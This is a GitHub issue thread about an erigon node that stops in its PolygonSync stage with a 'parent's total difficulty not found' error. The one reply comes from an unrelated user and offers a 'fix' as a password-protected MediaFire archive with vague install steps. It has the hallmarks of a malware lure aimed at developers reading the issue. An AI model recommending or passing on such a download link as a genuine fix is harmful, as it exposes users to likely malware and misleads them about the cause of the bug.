### ISSUE TITLE
astrid stage - parent's total difficulty not found

### ISSUE THREAD

**Issue by taratorio** [erigontech/erigon#11818]
```[EROR] [08-31|16:45:42.170] [2/6 PolygonSync] stopping node          err="parent's total difficulty not found with hash d5434af5337611ff5ebea15a2cc2d7dbd0e4f059b47bb15e224196fe4b3fc572 and height 11400064: <nil>"```

@mh0lt to attach datadir copy and full debug logs of his instance

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
